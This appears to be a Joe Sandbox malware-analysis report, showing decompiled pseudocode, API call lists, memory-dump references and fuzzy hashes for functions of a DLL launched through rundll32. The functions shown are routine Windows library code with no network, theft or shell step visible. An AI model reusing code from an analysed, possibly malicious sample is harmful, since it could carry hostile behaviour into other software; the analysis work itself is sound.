                                                                                                            0x100377b2
                                                                                                            0x100377c4
                                                                                                            0x100377c9
                                                                                                            0x100377ce
                                                                                                            0x100377b4
                                                                                                            0x100377b4
                                                                                                            0x100377bc
                                                                                                            0x100377bc
                                                                                                            0x100377d6
                                                                                                            0x100377db
                                                                                                            0x100377e1
                                                                                                            0x100377e1
                                                                                                            0x100377e9
                                                                                                            0x100377ec
                                                                                                            0x100377fa
                                                                                                            0x100377ff
                                                                                                            0x10037806
                                                                                                            0x1003780b
                                                                                                            0x10037811
                                                                                                            0x10037811
                                                                                                            0x10037772
                                                                                                            0x10037814
                                                                                                            0x10037819
                                                                                                            0x10037823
                                                                                                            0x10037823
                                                                                                            0x1003782c
                                                                                                            0x1003782c
                                                                                                            0x10037758
                                                                                                            0x10037836

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                                                            • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                                                            • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                                                            • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                            • String ID:
                                                                                                            • API String ID: 784703316-0
                                                                                                            • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                                                            • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000F6EA Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1000F6EA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E100203CE(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000F6EA(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}












                                                                                                            0x1000f6ea
                                                                                                            0x1000f6ea
                                                                                                            0x1000f6ec
                                                                                                            0x1000f6f3
                                                                                                            0x1000f793
                                                                                                            0x1000f797
                                                                                                            0x1000f7a6
                                                                                                            0x1000f7aa
                                                                                                            0x1000f755
                                                                                                            0x1000f765
                                                                                                            0x1000f7bc
                                                                                                            0x00000000
                                                                                                            0x1000f7bc
                                                                                                            0x1000f767
                                                                                                            0x1000f768
                                                                                                            0x1000f76f
                                                                                                            0x1000f781
                                                                                                            0x1000f7b0
                                                                                                            0x1000f7b0
                                                                                                            0x1000f7b1
                                                                                                            0x1000f7b3
                                                                                                            0x00000000
                                                                                                            0x1000f7b3
                                                                                                            0x1000f783
                                                                                                            0x1000f78c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f78e
                                                                                                            0x1000f78e
                                                                                                            0x1000f78e
                                                                                                            0x1000f78f
                                                                                                            0x1000f790
                                                                                                            0x1000f7b4
                                                                                                            0x1000f7b9
                                                                                                            0x00000000
                                                                                                            0x1000f7bb
                                                                                                            0x1000f76f
                                                                                                            0x00000000
                                                                                                            0x1000f7ac
                                                                                                            0x1000f708
                                                                                                            0x1000f70d
                                                                                                            0x1000f741
                                                                                                            0x1000f729
                                                                                                            0x1000f72d
                                                                                                            0x00000000
                                                                                                            0x1000f733
                                                                                                            0x1000f73c
                                                                                                            0x00000000
                                                                                                            0x1000f73c
                                                                                                            0x1000f72d
                                                                                                            0x1000f753
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 506644340-0
                                                                                                            • Opcode ID: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                                                            • Opcode Fuzzy Hash: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024AA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t21;
				CHAR* _t22;
				int _t31;
				CHAR* _t33;
				intOrPtr _t35;
				CHAR* _t40;
				void* _t44;
				void* _t47;

				_t40 = _a4;
				_t31 = lstrlenA(_t40);
				_t21 = E10038481(_t40, 0, 0) - 1;
				_t44 = _t31 - _t21;
				_t35 = _t44 + _t40;
				_a4 = _t21;
				_v8 = _t35;
				if(_a8 < _t31) {
					if(_a8 >= _t21) {
						_t33 =  &(_t40[2]);
						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
							while( *_t33 != 0x5c) {
								_t33 = E100127D1(_t33);
							}
						}
						if(_t44 > 3) {
							do {
								_t33 = E100127D1(_t33);
							} while ( *_t33 != 0x5c);
						}
						_t22 = _a4;
						_t47 = _t33 - _t40;
						_t12 =  &(_t22[5]); // 0x5
						if(_a8 >= _t47 + _t12) {
							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
								do {
									_t33 = E100127D1(_t33);
								} while ( *_t33 != 0x5c);
							}
							 *((char*)(_t47 + _t40)) = 0;
							lstrcatA(_t40, "\\...");
							_t21 = lstrcatA(_t40, _t33);
						} else {
							_push(_v8);
							goto L14;
						}
					} else {
						if(_a12 == 0) {
							_t35 = 0x1003da51;
						}
						_push(_t35);
						L14:
						_t21 = lstrcpyA(_t40, ??);
					}
				}
				return _t21;
			}












                                                                                                            0x10024aa8
                                                                                                            0x10024ab7
                                                                                                            0x10024abe
                                                                                                            0x10024ac1
                                                                                                            0x10024ac6
                                                                                                            0x10024ac9
                                                                                                            0x10024acc
                                                                                                            0x10024acf
                                                                                                            0x10024ad8
                                                                                                            0x10024aeb
                                                                                                            0x10024aee
                                                                                                            0x10024b01
                                                                                                            0x10024aff
                                                                                                            0x10024aff
                                                                                                            0x10024b01
                                                                                                            0x10024b09
                                                                                                            0x10024b0b
                                                                                                            0x10024b11
                                                                                                            0x10024b16
                                                                                                            0x10024b0b
                                                                                                            0x10024b19
                                                                                                            0x10024b1e
                                                                                                            0x10024b20
                                                                                                            0x10024b27
                                                                                                            0x10024b43
                                                                                                            0x10024b35
                                                                                                            0x10024b3b
                                                                                                            0x10024b40
                                                                                                            0x10024b35
                                                                                                            0x10024b58
                                                                                                            0x10024b63
                                                                                                            0x10024b67
                                                                                                            0x10024b29
                                                                                                            0x10024b29
                                                                                                            0x00000000
                                                                                                            0x10024b29
                                                                                                            0x10024ada
                                                                                                            0x10024ade
                                                                                                            0x10024ae0
                                                                                                            0x10024ae0
                                                                                                            0x10024ae5
                                                                                                            0x10024b2c
                                                                                                            0x10024b2d
                                                                                                            0x10024b2d
                                                                                                            0x10024ad8
                                                                                                            0x10024b6d

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                                                              • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                                                            • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                                                            • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                                                            • String ID: \...
                                                                                                            • API String ID: 1604900594-1167917071
                                                                                                            • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                                                            • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100304C6 Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E100304C6(void* __ecx) {
				struct tagMSG _v28;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					if(_t21 != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E100220EE(_t40, GetDesktopWindow());
				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
				_t33 = E10029068();
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}











                                                                                                            0x100304d5
                                                                                                            0x100304d8
                                                                                                            0x100304da
                                                                                                            0x100304ff
                                                                                                            0x100304e5
                                                                                                            0x100304ed
                                                                                                            0x100304f8
                                                                                                            0x100304fe
                                                                                                            0x00000000
                                                                                                            0x100304fe
                                                                                                            0x10030581
                                                                                                            0x10030581
                                                                                                            0x1003050d
                                                                                                            0x10030516
                                                                                                            0x10030521
                                                                                                            0x10030528
                                                                                                            0x1003052e
                                                                                                            0x10030531
                                                                                                            0x10030534
                                                                                                            0x10030537
                                                                                                            0x1003053a
                                                                                                            0x1003054c
                                                                                                            0x10030559
                                                                                                            0x10030562
                                                                                                            0x1003055b
                                                                                                            0x1003055b
                                                                                                            0x1003055b
                                                                                                            0x1003056e
                                                                                                            0x1003056f
                                                                                                            0x10030574
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetMessageA.USER32 ref: 100304E5
                                                                                                            • DispatchMessageA.USER32 ref: 100304F8
                                                                                                            • PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                            • SetRectEmpty.USER32(?), ref: 10030528
                                                                                                            • GetDesktopWindow.USER32 ref: 10030540
                                                                                                            • LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                            • GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1192691108-0
                                                                                                            • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                                                            • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100358C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100358C8(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                            0x100358e3
                                                                                                            0x100358ea
                                                                                                            0x100358ed
                                                                                                            0x100358f0
                                                                                                            0x100358f3
                                                                                                            0x100358fe
                                                                                                            0x10035935
                                                                                                            0x10035935
                                                                                                            0x10035940
                                                                                                            0x10035945
                                                                                                            0x10035945
                                                                                                            0x1003594a
                                                                                                            0x1003594f
                                                                                                            0x1003594f
                                                                                                            0x10035958

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreate$Open
                                                                                                            • String ID: software
                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                            • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                                                            • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E1000799F() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1004ee08(_a4, _a8);
			}







                                                                                                            0x10007b5d
                                                                                                            0x10007b76
                                                                                                            0x10007bdd
                                                                                                            0x10007bdd
                                                                                                            0x10007bdf
                                                                                                            0x00000000
                                                                                                            0x10007be0
                                                                                                            0x10007b78
                                                                                                            0x10007b7f
                                                                                                            0x00000000
                                                                                                            0x10007b98
                                                                                                            0x10007b99
                                                                                                            0x10007b9c
                                                                                                            0x10007baa
                                                                                                            0x10007bad
                                                                                                            0x10007bb5
                                                                                                            0x10007bb6
                                                                                                            0x10007bb7
                                                                                                            0x10007bb8
                                                                                                            0x10007bbf
                                                                                                            0x10007bc2
                                                                                                            0x10007bc6
                                                                                                            0x10007bd3
                                                                                                            0x10007bd3
                                                                                                            0x10007bd9
                                                                                                            0x00000000
                                                                                                            0x10007bd9
                                                                                                            0x10007b7f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BA6
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BAD
                                                                                                            • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                            • String ID: B$DISPLAY
                                                                                                            • API String ID: 2307409384-3316187204
                                                                                                            • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                                                            • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10020D81 Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10020D8D
                                                                                                            • GetWindowRect.USER32 ref: 10020DA8
                                                                                                            • ScreenToClient.USER32 ref: 10020DBB
                                                                                                            • ScreenToClient.USER32 ref: 10020DC4
                                                                                                            • EqualRect.USER32 ref: 10020DCE
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 443303494-0
                                                                                                            • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                                                            • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001519D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1001519D(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1004f5e0( *0x1004c848);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E1001382A(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E10011400(0x10);
					} else {
						_push(_t17);
						_push( *0x1004c848);
						if( *0x1004f5e4() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x1004cb00;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}









                                                                                                            0x1001519f
                                                                                                            0x100151ab
                                                                                                            0x100151b3
                                                                                                            0x100151b5
                                                                                                            0x100151b7
                                                                                                            0x100151b9
                                                                                                            0x100151be
                                                                                                            0x100151c5
                                                                                                            0x100151cb
                                                                                                            0x100151fa
                                                                                                            0x100151fc
                                                                                                            0x100151cd
                                                                                                            0x100151cd
                                                                                                            0x100151ce
                                                                                                            0x100151dc
                                                                                                            0x00000000
                                                                                                            0x100151de
                                                                                                            0x100151de
                                                                                                            0x100151e5
                                                                                                            0x100151ec
                                                                                                            0x100151f2
                                                                                                            0x100151f6
                                                                                                            0x100151f6
                                                                                                            0x100151dc
                                                                                                            0x100151cb
                                                                                                            0x10015203
                                                                                                            0x1001520d

                                                                                                            APIs
